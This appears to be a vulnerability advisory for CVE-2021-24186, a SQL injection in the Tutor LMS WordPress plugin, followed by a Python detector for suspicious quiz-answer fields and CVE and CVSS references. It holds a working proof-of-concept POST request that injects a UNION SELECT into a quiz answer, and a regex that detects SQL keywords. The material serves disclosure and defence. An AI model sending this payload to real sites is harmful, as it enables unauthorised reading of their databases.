Description
The tutor_answering_quiz_question/get_answer_by_id function pair from the Tutor LMS WordPress plugin before 1.8.3 was vulnerable to UNION-based SQL injection that could be exploited by students.
### PoC
```
POST /courses/first-class/tutor_quiz/test/ HTTP/1.1
Host: [URL]
Content-Length: 413
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: [URL]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: [URL]
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [COOKIES]
Connection: close

_wpnonce=[REPLACE_WITH_VALID_NONCE]&_wp_http_referer=%2Fcourses%2Ffirst-class%2Ftutor_quiz%2Ftest%2F&attempt_id=1&tutor_action=tutor_answering_quiz_question&attempt%5B1%5D%5Bquiz_question_ids%5D%5B%5D=&attempt%5B1%5D%5Bquiz_question%5D%5B1%5D=1 UNION select 1,2,3,version(),5,6,7,8,9,10.11,12,13;--&attempt%5B1%5D%5Bquiz_question_ids%5D%5B%5D=2&attempt%5B1%5D%5Bquiz_question%5D%5B2%5D=5&quiz_answer_submit_btn=quiz_answer_submit
```

Then send a GET request to http://[URL]/dashboard/my-quiz-attempts/attempts-details/?attempt_id=1
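A defender-side check for the request pattern in the PoC, as an added example that is not part of the advisory or the plugin's code: it flags `attempt[<id>][quiz_question][<id>]` fields whose value is not a bare integer. The function name, the constructed sample body, and the assumption that answers to choice-type questions are integer answer IDs are illustrative.

```python
import re
from urllib.parse import parse_qsl

# Field shape taken from the PoC body: attempt[<attempt_id>][quiz_question][<question_id>]
ANSWER_FIELD = re.compile(r"^attempt\[(\d+)\]\[quiz_question\]\[(\d+)\](\[\])?$")
# Assumption: a choice-type answer is submitted as a plain integer answer ID.
ANSWER_ID = re.compile(r"^\d{1,20}$")
# Coarse SQL markers used only to rank findings, not as the primary check.
SQL_HINT = re.compile(r"\b(union|select|sleep|benchmark|information_schema)\b|--|/\*|;", re.I)

def suspicious_answers(body: str):
    """Return one finding per answer field whose value is not a bare integer."""
    findings = []
    # PHP splits form bodies on '&' only, so do the same here.
    for name, value in parse_qsl(body, keep_blank_values=True, separator="&"):
        m = ANSWER_FIELD.match(name)
        if not m or value == "" or ANSWER_ID.match(value):
            continue
        findings.append({
            "attempt_id": int(m.group(1)),
            "question_id": int(m.group(2)),
            "value": value,
            # Free-text answers also land here; this flag separates them
            # from values that carry SQL syntax.
            "sql_keywords": bool(SQL_HINT.search(value)),
        })
    return findings

# Constructed sample body modelled on the PoC (shortened, URL-encoded).
SAMPLE_BODY = (
    "_wpnonce=x&attempt_id=1&tutor_action=tutor_answering_quiz_question"
    "&attempt%5B1%5D%5Bquiz_question_ids%5D%5B%5D=1"
    "&attempt%5B1%5D%5Bquiz_question%5D%5B1%5D=1+UNION+select+1%2C2%2C3"
    "&attempt%5B1%5D%5Bquiz_question%5D%5B2%5D=5"
    "&attempt%5B1%5D%5Bquiz_question%5D%5B3%5D=Paris"
)

if __name__ == "__main__":
    for finding in suspicious_answers(SAMPLE_BODY):
        print(finding)
```

The same integer check, applied server-side before the value reaches a query, is the input-validation half of the fix; the other half is a parameterized query.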
Affected Software

| CPE Name | Name | Version |
| --- | --- | --- |
| | tutor | < 1.8.3 |
Related
- WPVDB-ID:5F5C0C6C-6F76-4366-B590-0AAB557F8C60 (wpvulndb): Tutor LMS < 1.8.3 - SQL Injection via tutor_answering_quiz_question/get_answer_by_id. Published 2021-03-15, modified 2021-03-20. Reporter: Chloe Chamberland. CVSS 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N). https://wpscan.com/vulnerability/5f5c0c6c-6f76-4366-b590-0aab557f8c60. Reference: https://www.wordfence.com/blog/2021/03/several-vulnerabilities-patched-in-tutor-lms-plugin/
- CVE-2021-24186 (NVD): The tutor_answering_quiz_question/get_answer_by_id function pair from the Tutor LMS – eLearning and online course solution WordPress plugin before 1.8.3 was vulnerable to UNION based SQL injection that could be exploited by students. CWE-89. CVSS v3.1 base score 6.5 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N); CVSS v2 base score 4.0 MEDIUM (AV:N/AC:L/Au:S/C:P/I:N/A:N). Published 2021-04-05, modified 2021-04-09. https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24186
- WPEX-ID:5F5C0C6C-6F76-4366-B590-0AAB557F8C60 (wpexploit): Tutor LMS < 1.8.3 - SQL Injection via tutor_answering_quiz_question/get_answer_by_id. Published 2021-03-15, modified 2021-03-20. CVSS 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N).